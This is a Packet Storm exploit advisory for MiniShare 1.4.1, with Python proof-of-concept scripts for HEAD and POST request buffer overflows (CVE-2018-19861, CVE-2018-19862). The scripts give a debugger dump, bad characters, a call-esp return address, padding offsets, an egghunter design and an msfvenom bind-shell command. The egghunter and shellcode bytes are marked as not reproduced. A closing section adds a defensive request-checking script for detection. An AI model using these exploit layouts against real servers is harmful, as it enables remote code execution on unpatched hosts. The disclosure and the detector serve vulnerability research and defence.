
MiniShare 1.4.1 HEAD / POST Buffer Overflow

Rafael Pedrero
Packet Storm: PACKETSTORM:150689
Dec 07, 2018

Hi!!! Playing in 2006.... I have adapted the exploit to Python.
Not only the GET method is vulnerable to a BOF (CVE-2004-2271); the HEAD and POST
methods are also vulnerable. The difference is minimal, and both are exploited
in the same way. Only a 1-byte difference: GET = 3, HEAD and POST = 4 in length.

```text
EAX 00000000
ECX 77C3EF3B msvcrt.77C3EF3B
EDX 00F14E38
EBX 43346843
ESP 01563908 ASCII
EBP 0156BB90
ESI 00000001
EDI 01565B68
EIP 68433568
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDD000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
```

Only 210 bytes available for the shellcode.
Badchars: '00', '0d'

```text
>findjmp kernel32.dll esp - XP SP 3 English
Scanning kernel32.dll for code useable with the esp register
0x7C809F83 call esp
0x7C8369E0 call esp
0x7C83C2C5 push esp - ret
0x7C87641B call esp
```

# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.  
# Date: 05-12-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage:  
# Software Link:  
# Version: Minishare v1.4.1  
# Tested on: Windows  
# CVE : CVE-2018-19861  
# Category: exploit  
1. Description  
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to  
execute arbitrary code via a long HTTP HEAD request.  
2. Proof of Concept  
```python
#!/usr/bin/env python
import socket
import struct
import os
# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
# execute arbitrary code via a long HTTP HEAD request - by Rafa
# CVE: CVE-2018-19861
# Via Egghunter because shellcode in ESP only 210 bytes long.
# Project Home Page (MiniShare) -
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = ""
port = 80
# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34
# (the egghunter bytes are not reproduced on this page)
egghunter =
#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -a x86 --platform windows -b "\x00\x0d" -f c
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of c file: 1516 bytes
#unsigned char buf[] =
# (the generated payload, assigned to 'shellcode' below, is not reproduced on this page)
# findjmp kernel32.dll esp - WinXP SP3 English
#0x7C809F83 call esp
nops = "\x90" * 16
# 1786 bytes of padding, then the overwritten return address (call esp), NOPs, egghunter, filler to 2000 bytes
junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 - 1786 - 4 - 16 - len(egghunter))
print "Sending exploit..."
buffer = (
    "HEAD " + junk + " HTTP/1.1\r\n"
    "Host: " + shellcode + "\r\n\r\n")
# (the socket connect/send and the try/except around it are not reproduced on this page)
print "\nExploit Sended ", len(buffer)
print "Connection error"
```

3. Solution:  
This product is deprecated  
# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.  
# Date: 05-12-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage:  
# Software Link:  
# Version: Minishare v1.4.1  
# Tested on: Windows  
# CVE : CVE-2018-19862  
# Category: exploit  
1. Description  
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to  
execute arbitrary code via a long HTTP POST request.  
2. Proof of Concept  
```python
#!/usr/bin/env python
import socket
import struct
import os
# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
# execute arbitrary code via a long HTTP POST request - by Rafa
# CVE: CVE-2018-19862
# Via Egghunter because shellcode in ESP only 210 bytes long.
# Project Home Page (MiniShare) -
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = ""
port = 80
# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34
# (the egghunter bytes are not reproduced on this page)
egghunter =
#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -a x86 --platform windows -b "\x00\x0d" -f c
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of c file: 1516 bytes
#unsigned char buf[] =
# (the generated payload, assigned to 'shellcode' below, is not reproduced on this page)
# findjmp kernel32.dll esp - WinXP SP3 English
#0x7C809F83 call esp
nops = "\x90" * 16
# 1786 bytes of padding, then the overwritten return address (call esp), NOPs, egghunter, filler to 2000 bytes
junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 - 1786 - 4 - 16 - len(egghunter))
print "Sending exploit..."
buffer = (
    "POST " + junk + " HTTP/1.1\r\n"
    "Host: " + shellcode + "\r\n\r\n")
# (the socket connect/send and the try/except around it are not reproduced on this page)
print "\nExploit Sended ", len(buffer)
print "Connection error"
```

3. Solution:  
This product is deprecated  
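The one-byte method-length detail noted at the top (GET = 3, HEAD and POST = 4) is also why a defender's check for this bug class must not key on the method: a signature written for the 2004 GET variant alone misses the HEAD and POST requests, even though the oversized request-target is identical. The following Python is an added example, not code from the advisory or from MiniShare; it parses a raw HTTP request head and flags an oversized request-target, an oversized header value, or non-printable bytes in either, for every method. The thresholds and the sample requests are constructed assumptions for this example (the samples use padding bytes only; no payload).

```python
"""
Method-agnostic request-head checks for a front end or IDS rule, as a
defensive counterpart to the MiniShare HEAD/POST overflow advisory.
Thresholds and sample requests below are assumptions for this example.
"""
import re
import string

# Assumed limits: MiniShare serves short file paths, so a request-target or
# header value in the kilobyte range is not a legitimate request.
MAX_TARGET_LEN = 1024
MAX_HEADER_VALUE_LEN = 1024
PRINTABLE = set(bytes(string.printable, "ascii"))

REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) (HTTP/\d\.\d)$")


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request head into (method, target, headers).

    Returns None if the request line or a header line is malformed. Only the
    head (up to the first blank line) is inspected; no body is needed.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return None
    headers = []
    for line in lines[1:]:
        if b":" not in line:
            return None
        name, value = line.split(b":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return m.group(1).decode("ascii"), m.group(2), headers


def suspicious_bytes(value: bytes) -> bool:
    """True if the value carries bytes outside printable ASCII; NOP sleds,
    return addresses and encoded payloads are not printable text."""
    return any(b not in PRINTABLE for b in value)


def check_request(raw: bytes):
    """Return a list of findings for one request head; empty means clean."""
    parsed = parse_request(raw)
    if parsed is None:
        return ["malformed request line"]
    method, target, headers = parsed
    findings = []
    if len(target) > MAX_TARGET_LEN:
        findings.append(f"{method}: request-target length {len(target)} > {MAX_TARGET_LEN}")
    if suspicious_bytes(target):
        findings.append(f"{method}: non-printable bytes in request-target")
    for name, value in headers:
        hname = name.decode("ascii", "replace")
        if len(value) > MAX_HEADER_VALUE_LEN:
            findings.append(f"{method}: header {hname} length {len(value)} > {MAX_HEADER_VALUE_LEN}")
        if suspicious_bytes(value):
            findings.append(f"{method}: non-printable bytes in header {hname}")
    return findings


def get_only_rule(raw: bytes) -> bool:
    """The narrow rule a signature for CVE-2004-2271 alone might use. It only
    considers GET, so the HEAD and POST variants pass straight through."""
    return raw.startswith(b"GET ") and len(raw.split(b" ", 2)[1]) > MAX_TARGET_LEN


# Constructed samples: padding bytes stand in for any payload.
NORMAL_GET = b"GET /index.html HTTP/1.1\r\nHost: fileserver\r\n\r\n"
LONG_HEAD = b"HEAD /" + b"A" * 2000 + b" HTTP/1.1\r\nHost: fileserver\r\n\r\n"
BINARY_POST_HOST = b"POST /upload HTTP/1.1\r\nHost: " + b"\x90" * 16 + b"B" * 355 + b"\r\n\r\n"

if __name__ == "__main__":
    samples = (("normal GET", NORMAL_GET), ("long HEAD", LONG_HEAD), ("POST, binary Host", BINARY_POST_HOST))
    for label, req in samples:
        print(f"{label}: {check_request(req) or 'clean'} | GET-only rule fires: {get_only_rule(req)}")
```

The length check catches the 2000-byte request-target regardless of method, and the printable-bytes check catches a short header value that carries binary data (the `Host:` header in the advisory's PoC is far below any length threshold, so length alone would not flag it). A WAF or reverse proxy in front of a legacy server like this is the practical mitigation, since the product itself is deprecated.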